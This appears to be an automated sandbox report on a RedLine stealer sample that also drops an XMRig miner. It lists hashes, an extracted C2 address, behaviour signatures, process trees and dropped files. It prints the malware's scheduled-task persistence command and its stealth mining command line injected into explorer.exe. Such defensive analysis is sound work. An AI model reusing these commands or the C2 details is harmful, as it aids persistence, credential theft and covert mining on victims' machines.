Analysis
-
max time kernel
144s -
max time network
157s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
14-07-2021 16:59
Static task
static1
Behavioral task
behavioral1
Sample
mixruzki_20210714-064055.exe
Resource
win7v20210410
General
-
Target
mixruzki_20210714-064055.exe
-
Size
363KB
-
MD5
e82ce292a4c410c44c1f4da25d02a167
-
SHA1
61d4f9a1ea9457e667006bb8c8911c91ab00c487
-
SHA256
299dc3bb613a10e1a2d96c3e49d62d42145b1a48fbd6a087da6cc56661e82546
-
SHA512
0bc579f87ed5466d30466ae10df8378417c1d8424a867bc488faf09558967ca592846148b8ea77b7c6a729e5c754cd4d77b9f23346b0669906467a0d487a3971
Malware Config
Extracted
redline
test1
185.215.113.63:23098
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2636-119-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral2/memory/2636-120-0x0000000000417EA2-mapping.dmp family_redline -
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2628-162-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/2628-163-0x00000001402EB66C-mapping.dmp xmrig behavioral2/memory/2628-165-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
71120815.exesihost64.exeservices64.exepid process 3472 71120815.exe 3164 sihost64.exe 2104 services64.exe -
Cryptocurrency Miner
Makes network request to known mining pool URL.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
mixruzki_20210714-064055.exeservices64.exedescription pid process target process PID 3128 set thread context of 2636 3128 mixruzki_20210714-064055.exe mixruzki_20210714-064055.exe PID 2104 set thread context of 2628 2104 services64.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2380 schtasks.exe 2192 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
mixruzki_20210714-064055.exe71120815.exeservices64.exepid process 2636 mixruzki_20210714-064055.exe 2636 mixruzki_20210714-064055.exe 3472 71120815.exe 3472 71120815.exe 2104 services64.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
mixruzki_20210714-064055.exe71120815.exeservices64.exeexplorer.exedescription pid process Token: SeDebugPrivilege 2636 mixruzki_20210714-064055.exe Token: SeDebugPrivilege 3472 71120815.exe Token: SeDebugPrivilege 2104 services64.exe Token: SeLockMemoryPrivilege 2628 explorer.exe Token: SeLockMemoryPrivilege 2628 explorer.exe -
Suspicious use of WriteProcessMemory 37 IoCs
Processes:
mixruzki_20210714-064055.exemixruzki_20210714-064055.exe71120815.execmd.exeservices64.execmd.exedescription pid process target process PID 3128 wrote to memory of 2636 3128 mixruzki_20210714-064055.exe mixruzki_20210714-064055.exe PID 3128 wrote to memory of 2636 3128 mixruzki_20210714-064055.exe mixruzki_20210714-064055.exe PID 3128 wrote to memory of 2636 3128 mixruzki_20210714-064055.exe mixruzki_20210714-064055.exe PID 3128 wrote to memory of 2636 3128 mixruzki_20210714-064055.exe mixruzki_20210714-064055.exe PID 3128 wrote to memory of 2636 3128 mixruzki_20210714-064055.exe mixruzki_20210714-064055.exe PID 3128 wrote to memory of 2636 3128 mixruzki_20210714-064055.exe mixruzki_20210714-064055.exe PID 3128 wrote to memory of 2636 3128 mixruzki_20210714-064055.exe mixruzki_20210714-064055.exe PID 3128 wrote to memory of 2636 3128 mixruzki_20210714-064055.exe mixruzki_20210714-064055.exe PID 2636 wrote to memory of 3472 2636 mixruzki_20210714-064055.exe 71120815.exe PID 2636 wrote to memory of 3472 2636 mixruzki_20210714-064055.exe 71120815.exe PID 3472 wrote to memory of 360 3472 71120815.exe cmd.exe PID 3472 wrote to memory of 360 3472 71120815.exe cmd.exe PID 360 wrote to memory of 2380 360 cmd.exe schtasks.exe PID 360 wrote to memory of 2380 360 cmd.exe schtasks.exe PID 3472 wrote to memory of 3164 3472 71120815.exe sihost64.exe PID 3472 wrote to memory of 3164 3472 71120815.exe sihost64.exe PID 3472 wrote to memory of 2104 3472 71120815.exe services64.exe PID 3472 wrote to memory of 2104 3472 71120815.exe services64.exe PID 2104 wrote to memory of 2324 2104 services64.exe cmd.exe PID 2104 wrote to memory of 2324 2104 services64.exe cmd.exe PID 2324 wrote to memory of 2192 2324 cmd.exe schtasks.exe PID 2324 wrote to memory of 2192 2324 cmd.exe schtasks.exe PID 2104 wrote to memory of 2628 2104 services64.exe explorer.exe PID 2104 wrote to memory of 2628 2104 services64.exe explorer.exe PID 2104 wrote to memory of 2628 2104 services64.exe explorer.exe PID 2104 wrote to memory of 2628 2104 services64.exe explorer.exe PID 2104 wrote to memory of 2628 2104 services64.exe explorer.exe PID 2104 wrote to memory of 2628 2104 services64.exe explorer.exe PID 2104 wrote to memory of 2628 2104 services64.exe explorer.exe PID 2104 wrote to memory of 2628 2104 services64.exe explorer.exe PID 2104 wrote to memory of 2628 2104 services64.exe explorer.exe PID 2104 wrote to memory of 2628 2104 services64.exe explorer.exe PID 2104 wrote to memory of 2628 2104 services64.exe explorer.exe PID 2104 wrote to memory of 2628 2104 services64.exe explorer.exe PID 2104 wrote to memory of 2628 2104 services64.exe explorer.exe PID 2104 wrote to memory of 2628 2104 services64.exe explorer.exe PID 2104 wrote to memory of 2628 2104 services64.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\mixruzki_20210714-064055.exe"C:\Users\Admin\AppData\Local\Temp\mixruzki_20210714-064055.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\mixruzki_20210714-064055.exeC:\Users\Admin\AppData\Local\Temp\mixruzki_20210714-064055.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\71120815.exe"C:\Users\Admin\AppData\Local\Temp\71120815.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\services64.exe"C:\Users\Admin\AppData\Local\Temp\services64.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'6⤵
- Creates scheduled task(s)
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com --user=hidminer@protonmail.com --pass= --cpu-max-threads-hint=30 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth5⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mixruzki_20210714-064055.exe.logMD5
7438b57da35c10c478469635b79e33e1
SHA15ffcbdfbfd800f67d6d9d6ee46de2eb13fcbb9a5
SHA256b253c066d4a6604aaa5204b09c1edde92c410b0af351f3760891f5e56c867f70
SHA5125887796f8ceb1c5ae790caff0020084df49ea8d613b78656a47dc9a569c5c86a9b16ec2ebe0d6f34c5e3001026385bb1282434cc3ffc7bda99427c154c04b45a
-
C:\Users\Admin\AppData\Local\Temp\71120815.exeMD5
ef460c0a6998ba8f81b18efbd42ef21d
SHA127e5a5345ae708facb0a644648a6e84fa7fc4899
SHA25663d38ae546f811d04a1c9bf42a30c555d17cf0a58710fa10d952b7aca0c916f4
SHA512660e2e230d2db3132a890ba419628bfbe1174002d74b166323d7eebf4775900aa383ebcd179564f4155beb804e269d02ebaba9e2d5e65ae0405699c9d3ee9a2b
-
C:\Users\Admin\AppData\Local\Temp\71120815.exeMD5
ef460c0a6998ba8f81b18efbd42ef21d
SHA127e5a5345ae708facb0a644648a6e84fa7fc4899
SHA25663d38ae546f811d04a1c9bf42a30c555d17cf0a58710fa10d952b7aca0c916f4
SHA512660e2e230d2db3132a890ba419628bfbe1174002d74b166323d7eebf4775900aa383ebcd179564f4155beb804e269d02ebaba9e2d5e65ae0405699c9d3ee9a2b
-
C:\Users\Admin\AppData\Local\Temp\services64.exeMD5
ef460c0a6998ba8f81b18efbd42ef21d
SHA127e5a5345ae708facb0a644648a6e84fa7fc4899
SHA25663d38ae546f811d04a1c9bf42a30c555d17cf0a58710fa10d952b7aca0c916f4
SHA512660e2e230d2db3132a890ba419628bfbe1174002d74b166323d7eebf4775900aa383ebcd179564f4155beb804e269d02ebaba9e2d5e65ae0405699c9d3ee9a2b
-
C:\Users\Admin\AppData\Local\Temp\services64.exeMD5
ef460c0a6998ba8f81b18efbd42ef21d
SHA127e5a5345ae708facb0a644648a6e84fa7fc4899
SHA25663d38ae546f811d04a1c9bf42a30c555d17cf0a58710fa10d952b7aca0c916f4
SHA512660e2e230d2db3132a890ba419628bfbe1174002d74b166323d7eebf4775900aa383ebcd179564f4155beb804e269d02ebaba9e2d5e65ae0405699c9d3ee9a2b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sysMD5
0c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
5cb459f1bd32583f0f8488777d5b85ab
SHA13cf61e2dfab52fa45ec8fc70f7a2f62a7d9e4e02
SHA256044b03caef2acf7273c10472a8d7c6e43df2d4c0f5d371497885b1eb881f803d
SHA5121dd0285756c20bc03a70703f9431b86ec331bc591b19deae752064d46d4d7cd05e2afde04306dcb147ba6e218ab4b1dbe78e27f37297ac1256a19f80e6d6a7fb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
5cb459f1bd32583f0f8488777d5b85ab
SHA13cf61e2dfab52fa45ec8fc70f7a2f62a7d9e4e02
SHA256044b03caef2acf7273c10472a8d7c6e43df2d4c0f5d371497885b1eb881f803d
SHA5121dd0285756c20bc03a70703f9431b86ec331bc591b19deae752064d46d4d7cd05e2afde04306dcb147ba6e218ab4b1dbe78e27f37297ac1256a19f80e6d6a7fb
-
memory/360-141-0x0000000000000000-mapping.dmp
-
memory/2104-147-0x0000000000000000-mapping.dmp
-
memory/2104-160-0x000000001C230000-0x000000001C231000-memory.dmpFilesize
4KB
-
memory/2104-159-0x00000000010E0000-0x00000000010E2000-memory.dmpFilesize
8KB
-
memory/2192-157-0x0000000000000000-mapping.dmp
-
memory/2324-156-0x0000000000000000-mapping.dmp
-
memory/2380-142-0x0000000000000000-mapping.dmp
-
memory/2628-163-0x00000001402EB66C-mapping.dmp
-
memory/2628-165-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/2628-162-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/2628-164-0x0000000002990000-0x00000000029B0000-memory.dmpFilesize
128KB
-
memory/2636-119-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/2636-127-0x0000000005230000-0x0000000005231000-memory.dmpFilesize
4KB
-
memory/2636-124-0x0000000005710000-0x0000000005711000-memory.dmpFilesize
4KB
-
memory/2636-125-0x0000000005190000-0x0000000005191000-memory.dmpFilesize
4KB
-
memory/2636-132-0x00000000068E0000-0x00000000068E1000-memory.dmpFilesize
4KB
-
memory/2636-131-0x0000000006E10000-0x0000000006E11000-memory.dmpFilesize
4KB
-
memory/2636-134-0x0000000007840000-0x0000000007841000-memory.dmpFilesize
4KB
-
memory/2636-133-0x0000000006BF0000-0x0000000006BF1000-memory.dmpFilesize
4KB
-
memory/2636-130-0x0000000006710000-0x0000000006711000-memory.dmpFilesize
4KB
-
memory/2636-120-0x0000000000417EA2-mapping.dmp
-
memory/2636-129-0x00000000054A0000-0x00000000054A1000-memory.dmpFilesize
4KB
-
memory/2636-128-0x0000000005100000-0x0000000005706000-memory.dmpFilesize
6.0MB
-
memory/2636-126-0x00000000051F0000-0x00000000051F1000-memory.dmpFilesize
4KB
-
memory/3128-118-0x0000000004B30000-0x0000000004B31000-memory.dmpFilesize
4KB
-
memory/3128-114-0x0000000000120000-0x0000000000121000-memory.dmpFilesize
4KB
-
memory/3128-116-0x0000000004980000-0x0000000004981000-memory.dmpFilesize
4KB
-
memory/3128-117-0x0000000004900000-0x0000000004901000-memory.dmpFilesize
4KB
-
memory/3164-154-0x0000000000F10000-0x0000000000F12000-memory.dmpFilesize
8KB
-
memory/3164-158-0x000000001C310000-0x000000001C312000-memory.dmpFilesize
8KB
-
memory/3164-148-0x00000000006A0000-0x00000000006A1000-memory.dmpFilesize
4KB
-
memory/3164-144-0x0000000000000000-mapping.dmp
-
memory/3472-143-0x0000000000DD0000-0x0000000000DD2000-memory.dmpFilesize
8KB
-
memory/3472-140-0x0000000000E00000-0x0000000000E0B000-memory.dmpFilesize
44KB
-
memory/3472-138-0x00000000005E0000-0x00000000005E1000-memory.dmpFilesize
4KB
-
memory/3472-135-0x0000000000000000-mapping.dmp